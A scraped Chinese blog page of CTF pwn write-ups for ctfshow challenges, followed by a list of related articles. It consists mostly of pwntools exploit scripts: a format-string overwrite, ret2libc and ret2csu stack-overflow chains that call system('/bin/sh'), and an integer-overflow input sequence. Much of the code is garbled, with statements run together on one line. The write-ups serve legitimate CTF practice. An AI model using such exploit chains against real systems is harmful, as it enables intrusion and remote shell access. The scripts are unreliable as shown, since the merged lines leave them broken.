PWN-PRACTICE-CTFSHOW-3

PWN-PRACTICE-CTFSHOW-3

    • pwn10
    • 萌新赛-签到题
    • 萌新赛-数学99
    • 内部赛-签到题

pwn10

格式化字符串漏洞,覆写num为16即可打印出flag

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28045)
elf=ELF("./pwn1")#gdb.attach(io,"b * 0x080485D0")
#pause()num_addr=0x0804A030
io.recvuntil("try pwn me?")
payload=p32(num_addr)+"8"*12+"%7$hhn"
io.sendline(payload)#pause()io.interactive()

萌新赛-签到题

栈溢出,ret2libc

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28018)
elf=ELF("./pwn1")puts_got=elf.got["puts"]
puts_plt=elf.plt["puts"]
main_addr=0x400687
pop_rdi=0x400793
ret=0x40053eio.recvuntil("successful!\n")
payload="a"*0x70+"b"*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
io.sendline(payload)
puts_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
print("puts_addr=="+hex(puts_addr))
libc_base=puts_addr-0x0809c0
system=libc_base+0x04f440
binsh=libc_base+0x1b3e9aio.recvuntil("successful!\n")
payload="a"*0x70+"b"*8+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)+p64(main_addr)
io.sendline(payload)io.interactive()

萌新赛-数学99

整型溢出

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28171)
elf=ELF("./pwn1")io.sendlineafter("a:",str(2147483658))
io.sendlineafter("b:",str(2147483649))io.sendlineafter("a:",str(9629))
io.sendlineafter("b:",str(446045))io.sendlineafter("a:",str(2147483648))
io.sendlineafter("b:",str(-1))io.interactive()

内部赛-签到题

栈溢出,ret2csu

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28116)
elf=ELF("./pwn1")write_got=elf.got["write"]
write_plt=elf.plt["write"]
main_addr=0x4005FDgadget_2=0x00000000004006A0
gadget_1=0x00000000004006BA
def com_gadget(rbx,rbp,r12,r13,r14,r15,main_addr):payload="a"*(160+8)payload+=p64(gadget_1)payload+=p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15)payload+=p64(gadget_2)payload+="a"*56 payload+=p64(main_addr)return payloadio.recvuntil("Try Pwn Me?\n")
payload=com_gadget(0,1,write_got,8,write_got,1,main_addr)
io.sendline(payload)
write_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
print("write_addr=="+hex(write_addr))
libc_base=write_addr-0x110140
system=libc_base+0x04f440
binsh=libc_base+0x1b3e9apop_rdi=0x4006c3
ret=0x4004a9
io.recvuntil("Try Pwn Me?\n")
payload="a"*(160+8)+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)
io.sendline(payload)io.interactive()

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/438011.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Python PEP8 代码规范常见问题及解决方法

Python PEP8 代码规范常见问题及解决方法

之前一直用 Python IDLE 写代码,最近换成 PyCharm 写代码总是会出现波浪号,这才了解到 Python 的 PEP8 代码规范,所以将常见的 PEP8 代码规范问题和解决方法记录一下,学习一下,遇到了再持续更新,养成良好的…
阅读更多...
基于.NET平台的分层架构实战(一)——综述

基于.NET平台的分层架构实战(一)——综述

通过浏览博客园的文章发现,很多朋友对分层架构特别感兴趣,刚好我刚做完的毕业设计就是专门研究.NET平台上分层架构的(题目叫“基于.NET平台的分层架构与设计模式应用研究”)。通过做这篇论文,我对分层架构有了一定的了…
阅读更多...
Eclipse 通过 JDBC 连接 SQL Server

Eclipse 通过 JDBC 连接 SQL Server

文章目录1.配置 SQL Server 20122.开启 Telnet 服务3.测试1433端口是否打开4.下载JDBC5.Eclipse 连接 SQL Server6.测试连接本文用到的软件版本以及相关环境: Eclipse Photon Release (4.8.0) JDK-10.0.2 SQL Server 2012 1.配置 SQL Server 2012 打开 SQL Server …
阅读更多...
PWN-PRACTICE-CTFSHOW-4

PWN-PRACTICE-CTFSHOW-4

PWN-PRACTICE-CTFSHOW-4BJDCTF2020-babyrouterBJDCTF2020-babystackBJDCTF2020-dizzyBJDCTF2020-encryptde stackBJDCTF2020-babyrouter 栈溢出,ret2libc # -*- coding:utf-8 -*- from pwn import * context.log_level"debug" #ioprocess("./pwn1&…
阅读更多...
SQL Server 登录更换【Windows身份验证】为【SQL Server 身份验证】

SQL Server 登录更换【Windows身份验证】为【SQL Server 身份验证】

1、安装好 SQL Server 后,使用 Windows 身份验证登陆SQL,然后在服务器上右键,选择【属性】,在弹出的窗口中选择【安全性】,在服务器身份验证项里勾选【SQL Server 和 Windows 身份验证模式】,点击确定保存 …
阅读更多...
基于.NET平台的分层架构实战(二)——需求分析与数据库设计

基于.NET平台的分层架构实战(二)——需求分析与数据库设计

基于.NET平台的分层架构实战(五)——接口的设计与实现 基于.NET平台的分层架构实战(四)——实体类的设计与实现 基于.NET平台的分层架构实战(三)——架构概要设计 基于.NET平台的分层架构实战&#xff0…
阅读更多...
PWN-PRACTICE-CTFSHOW-5

PWN-PRACTICE-CTFSHOW-5

PWN-PRACTICE-CTFSHOW-5BJDCTF2020-router36D杯-签到36D杯-babyFmtstr36D杯-MagicStringBJDCTF2020-router 36D杯-签到 栈溢出&#xff0c;用ROPgadget找到一个"sh"字符串&#xff0c;ROP&#xff0c;程序过滤了cat和空格&#xff0c;more<flag绕过即可 # -*- c…
阅读更多...
Hexo 博客自定义一个不使用主题模板渲染的独立页面

Hexo 博客自定义一个不使用主题模板渲染的独立页面

2022-01-25 更新&#xff1a;博客新地址&#xff1a;https://www.itbob.cn/&#xff0c;文章距上次编辑时间较远&#xff0c;部分内容可能已经过时&#xff01; Hexo 是一个轻量、快速&#xff0c;简单和强大的博客框架&#xff0c;当我们需要发布博文的时候&#xff0c;只需要…
阅读更多...
log4net部分配置说明

log4net部分配置说明

第一步&#xff1a; 添加并应用Log4net.dll。然后在Web.config文件中添加下面的配置局 <configSections> <section name"log4net" type"log4net.Config.Log4NetConfigurationSectionHandler, log4net" /> </configSections> 第二步…
阅读更多...
网站ICP备案和公安备案流程

网站ICP备案和公安备案流程

2022-01-25 更新&#xff1a;博客新地址&#xff1a;https://www.itbob.cn/&#xff0c;文章距上次编辑时间较远&#xff0c;部分内容可能已经过时&#xff01; 文章目录-- ICP备案 1、填写信息验证备案类型2、产品验证3、填写网站信息4、上传资料5、人脸核验或幕布拍照核验6、…
阅读更多...
PWN-PRACTICE-CTFSHOW-6

PWN-PRACTICE-CTFSHOW-6

PWN-PRACTICE-CTFSHOW-636D杯-MengxinStack36D杯-tang1024杯-1024_happy_stack1024杯-1024_happy_checkin36D杯-MengxinStack 程序开了canary和PIE保护 泄露远程libc版本&#xff0c;为 libc6_2.23-0ubuntu10_amd64.so from pwn import * ioremote("pwn.challenge.ctf.s…
阅读更多...
CSS 与其预处理语言 Sass、Less、Stylus 之间的转化

CSS 与其预处理语言 Sass、Less、Stylus 之间的转化

预处理语言的由来&#xff1a;CSS 是一门非程序式语言&#xff0c;没有变量、函数、SCOPE&#xff08;作用域&#xff09;&#xff0c;需要书写大量看似没有逻辑的代码&#xff0c;不方便维护及扩 展&#xff0c;不利于复用&#xff0c;为了让 CSS 富有逻辑性&#xff0c;短板不…
阅读更多...
7款免费原型设计工具

7款免费原型设计工具

身为一位产品经理或设计师&#xff0c;原型设计工具是必不可少的工作伙伴。但我们难免会遇到预算有限的时候&#xff0c;这时候&#xff0c;去哪里寻找一款好用的免费原型设计工具呢&#xff1f;以下&#xff0c;小编为大家精心挑选了7款免费的原型工具&#xff0c;并对其进行了…
阅读更多...
PWN-PRACTICE-CTFSHOW-7

PWN-PRACTICE-CTFSHOW-7

PWN-PRACTICE-CTFSHOW-7大吉大利杯-easyrop大牛杯-guess吃鸡杯-win_pwn吃鸡杯-easy_canary大吉大利杯-easyrop 栈溢出&#xff0c;SROP # -*- coding:utf-8 -*- from pwn import * context.log_level"debug" context.arch"amd64" #32位和64位的sigframe结…
阅读更多...
【译】谨慎使用CSS中的波浪选择器

【译】谨慎使用CSS中的波浪选择器

最近我的一些项目都遇到了一些类似的样式问题。它们都错误地使用了波浪选择器&#xff0c;并造成了很多地方的CSS代码臃肿( CSS Bloat )。大家可能以前也都遇到或者使用过波浪选择器&#xff0c;毕竟它作为CSS选择器已经很长时间了&#xff0c; 甚至IE7都支持 。波浪选择器用来…
阅读更多...
HTML + CSS 实现 GitHub 项目标签、徽章样式

HTML + CSS 实现 GitHub 项目标签、徽章样式

经常会在GitHub上项目介绍的README.md文件中看到许多漂亮的标签&#xff0c;这些标签可以显示version、stars、license等信息 我们可以通过 https://shields.io/ 这个网站在线制作图标&#xff0c;填写label、message、color三个字段&#xff0c;点击Make Badge就可以生成图标…
阅读更多...
PWN-PRACTICE-CTFSHOW-8

PWN-PRACTICE-CTFSHOW-8

PWN-PRACTICE-CTFSHOW-8吃瓜杯-wuqian月饼杯II-简单的胖月饼杯II-容易的胖击剑杯-pwn01-My_sword_is_ready吃瓜杯-wuqian 栈溢出&#xff0c;ret2text # -*- coding:utf-8 -*- from pwn import * context.log_level"debug" #ioprocess("./pwn1") ioremot…
阅读更多...
nuget 包版本冲突解决 packages.config

nuget 包版本冲突解决 packages.config

开发项目中安装了Newtonsoft.Json组件&#xff0c;遇到了必须给Newtonsoft.Json降版本的问题。 原因是&#xff1a;项目是MVC项目&#xff0c;WebApi模块必须使用framework4.5.0.0的版本。而我们在安装其他组件时&#xff0c;不小心升级了Newtonsoft.Json,导致了系统可以编译通…
阅读更多...
instant.page —— 一个 JS 脚本实现网站预加载,提升页面加载速度

instant.page —— 一个 JS 脚本实现网站预加载,提升页面加载速度

instant.page 使用即时预加载技术&#xff0c;在用户点击之前预先加载页面。当用户的鼠标悬停在一个链接上超过 65 毫秒时&#xff0c;浏览器会对此页面进行预加载&#xff0c;当用户点击链接后&#xff0c;就从预加载的缓存中直接读取页面内容&#xff0c;从而达到缩短页面加载…
阅读更多...
陀螺仪、罗经、IMU、MEMS四者的区别

陀螺仪、罗经、IMU、MEMS四者的区别

罗经&#xff1a;罗经是航行器用来测量运动方位的&#xff0c;辅助定位的仪器。 磁罗经&#xff1a;磁罗经可以形象的看成指南针电罗经&#xff1a;电罗经就要用到用电源驱动的陀螺仪。 陀螺仪&#xff1a;是一种物体角运动测量装置。通过对陀螺仪双轴基点在不同运动状态下偏移…
阅读更多...
最新文章

Copyright @ 2022~2023